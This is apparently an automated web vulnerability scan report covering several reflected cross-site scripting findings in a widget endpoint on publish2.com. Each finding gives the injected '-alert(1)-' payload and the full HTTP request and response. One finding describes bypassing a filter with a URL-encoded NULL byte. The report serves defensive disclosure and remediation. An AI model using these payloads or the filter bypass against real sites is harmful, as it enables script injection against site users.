Content-Type: application/x-javascript

(function(){

getParentScriptTag = function() {
// Attempt to get parent script tag via id
scr = document.getElementById("publish2_widget_token");
// Legacy widgets don't have script
...[SNIP]...
links%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=252ab"-alert(1)-"dd91ceb4c9b&comment_font_size=") {
scr = scripts[i];
break;
}
}
}
};

injectContainer = function() {
// Unique container for widget HTML, hidden until filled so we
...[SNIP]...

2.389. http://www.publish2.com/syndicate/widget/ [comment_font_size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /syndicate/widget/

Issue detail

The value of the comment_font_size request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e7ac"-alert(1)-"9567f8361f4 was submitted in the comment_font_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size=3e7ac"-alert(1)-"9567f8361f4 HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://www.buzzmachine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:17:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: kohanasession=a53d1bvr9gop5u2dm4cgkdcom1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=a53d1bvr9gop5u2dm4cgkdcom1; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJhNTNkMWJ2cjlnb3A1dTJkbTRjZ2tkY29tMSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDU0MjM7; path=/
Content-Length: 3302
Content-Type: application/x-javascript

(function(){

getParentScriptTag = function() {
// Attempt to get parent script tag via id
scr = document.getElementById("publish2_widget_token");
// Legacy widgets don't have script
...[SNIP]...
&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size=3e7ac"-alert(1)-"9567f8361f4") {
scr = scripts[i];
break;
}
}
}
};

injectContainer = function() {
// Unique container for widget HTML, hidden until filled so we aren't adding elem
...[SNIP]...

2.390. http://www.publish2.com/syndicate/widget/ [feed parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /syndicate/widget/

Issue detail

The value of the feed request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a07f5"-alert(1)-"5df8b136fe5 was submitted in the feed parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/jsona07f5"-alert(1)-"5df8b136fe5&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size= HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://www.buzzmachine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: kohanasession=g8vm5ljoqlr7t1vc6rnf14faf7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=g8vm5ljoqlr7t1vc6rnf14faf7; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJnOHZtNWxqb3Fscjd0MXZjNnJuZjE0ZmFmNyI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUzNzI7; path=/
Content-Length: 3302
Content-Type: application/x-javascript

(function(){

getParentScriptTag = function() {
// Attempt to get parent script tag via id
scr = document.getElementById("publish2_widget_token");
// Legacy widgets don't have script
...[SNIP]...
<len; i++) {
if (scripts[i].src == "http://www.publish2.com/syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/jsona07f5"-alert(1)-"5df8b136fe5&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font
...[SNIP]...

2.391. http://www.publish2.com/syndicate/widget/ [feed_type parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /syndicate/widget/

Issue detail

The value of the feed_type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7935e"-alert(1)-"5c48060a29b was submitted in the feed_type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json7935e"-alert(1)-"5c48060a29b&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size= HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://www.buzzmachine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: kohanasession=afssah19gjfqofaibtf0q23ke6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=afssah19gjfqofaibtf0q23ke6; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJhZnNzYWgxOWdqZnFvZmFpYnRmMHEyM2tlNiI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUzNzY7; path=/
Content-Length: 3302
Content-Type: application/x-javascript

(function(){

getParentScriptTag = function() {
// Attempt to get parent script tag via id
scr = document.getElementById("publish2_widget_token");
// Legacy widgets don't have script
...[SNIP]...
<len; i++) {
if (scripts[i].src == "http://www.publish2.com/syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json7935e"-alert(1)-"5c48060a29b&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headli
...[SNIP]...

2.392. http://www.publish2.com/syndicate/widget/ [headline_font_color parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /syndicate/widget/

Issue detail

The value of the headline_font_color request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3ffa"-alert(1)-"7699e70d999 was submitted in the headline_font_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=a3ffa"-alert(1)-"7699e70d999&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size= HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://www.buzzmachine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: kohanasession=1v234rqnfu61rgcjs76i325773; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=1v234rqnfu61rgcjs76i325773; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiIxdjIzNHJxbmZ1NjFyZ2Nqczc2aTMyNTc3MyI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDU0MDU7; path=/
Content-Length: 3302
Content-Type: application/x-javascript

(function(){

getParentScriptTag = function() {
// Attempt to get parent script tag via id
scr = document.getElementById("publish2_widget_token");
// Legacy widgets don't have script
...[SNIP]...
sh2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=a3ffa"-alert(1)-"7699e70d999&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size=") {
scr = scripts[i];
break;
}
}
}
};

injectContainer = function()
...[SNIP]...

2.393. http://www.publish2.com/syndicate/widget/ [headline_font_decoration parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /syndicate/widget/

Issue detail

The value of the headline_font_decoration request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64f8a"-alert(1)-"f0710704c2a was submitted in the headline_font_decoration parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=64f8a"-alert(1)-"f0710704c2a&headline_font_weight=&comment_font_family=&comment_font_size= HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://www.buzzmachine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: kohanasession=thetfp6q0sq4lm24686c98ndc0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=thetfp6q0sq4lm24686c98ndc0; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJ0aGV0ZnA2cTBzcTRsbTI0Njg2Yzk4bmRjMCI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDU0MTA7; path=/
Content-Length: 3302
Content-Type: application/x-javascript

(function(){

getParentScriptTag = function() {
// Attempt to get parent script tag via id
scr = document.getElementById("publish2_widget_token");
// Legacy widgets don't have script
...[SNIP]...
et%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=64f8a"-alert(1)-"f0710704c2a&headline_font_weight=&comment_font_family=&comment_font_size=") {
scr = scripts[i];
break;
}
}
}
};

injectContainer = function() {
// Unique container
...[SNIP]...

2.394. http://www.publish2.com/syndicate/widget/ [headline_font_family parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /syndicate/widget/

Issue detail

The value of the headline_font_family request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1708"-alert(1)-"9b20a5116c1 was submitted in the headline_font_family parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=d1708"-alert(1)-"9b20a5116c1&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size= HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://www.buzzmachine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: kohanasession=om3dov2itai04v6n8rgv0k3nk2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=om3dov2itai04v6n8rgv0k3nk2; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJvbTNkb3YyaXRhaTA0djZuOHJndjBrM25rMiI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUzOTY7; path=/
Content-Length: 3302
Content-Type: application/x-javascript

(function(){

getParentScriptTag = function() {
// Attempt to get parent script tag via id
scr = document.getElementById("publish2_widget_token");
// Legacy widgets don't have script
...[SNIP]...
pe=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=d1708"-alert(1)-"9b20a5116c1&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size=") {
scr = scripts[i];
break;
}
}

...[SNIP]...

2.395. http://www.publish2.com/syndicate/widget/ [headline_font_size parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /syndicate/widget/

Issue detail

The value of the headline_font_size request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fad8d"-alert(1)-"f252e5b9e64 was submitted in the headline_font_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=fad8d"-alert(1)-"f252e5b9e64&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size= HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://www.buzzmachine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: kohanasession=8jgtl15njb1v6qjjvbjh06e4g1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=8jgtl15njb1v6qjjvbjh06e4g1; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiI4amd0bDE1bmpiMXY2cWpqdmJqaDA2ZTRnMSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDU0MDE7; path=/
Content-Length: 3302
Content-Type: application/x-javascript

(function(){

getParentScriptTag = function() {
// Attempt to get parent script tag via id
scr = document.getElementById("publish2_widget_token");
// Legacy widgets don't have script
...[SNIP]...
ttp%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=fad8d"-alert(1)-"f252e5b9e64&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size=") {
scr = scripts[i];
break;
}
}
}
};

injectC
...[SNIP]...

2.396. http://www.publish2.com/syndicate/widget/ [headline_font_weight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /syndicate/widget/

Issue detail

The value of the headline_font_weight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 580e5"-alert(1)-"142a37c3c4c was submitted in the headline_font_weight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=580e5"-alert(1)-"142a37c3c4c&comment_font_family=&comment_font_size= HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://www.buzzmachine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: kohanasession=sq9q1jcbih2sepgpf3hdlclse0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=sq9q1jcbih2sepgpf3hdlclse0; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJzcTlxMWpjYmloMnNlcGdwZjNoZGxjbHNlMCI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDU0MTQ7; path=/
Content-Length: 3302
Content-Type: application/x-javascript

(function(){

getParentScriptTag = function() {
// Attempt to get parent script tag via id
scr = document.getElementById("publish2_widget_token");
// Legacy widgets don't have script
...[SNIP]...
ists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=580e5"-alert(1)-"142a37c3c4c&comment_font_family=&comment_font_size=") {
scr = scripts[i];
break;
}
}
}
};

injectContainer = function() {
// Unique container for widget HTML, hidd
...[SNIP]...

2.397. http://www.publish2.com/syndicate/widget/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /syndicate/widget/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0088f8f"-alert(1)-"9893ef1728b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 88f8f"-alert(1)-"9893ef1728b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /syndicate/widget/?%0088f8f"-alert(1)-"9893ef1728b=1 HTTP/1.1
Host: www.publish2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
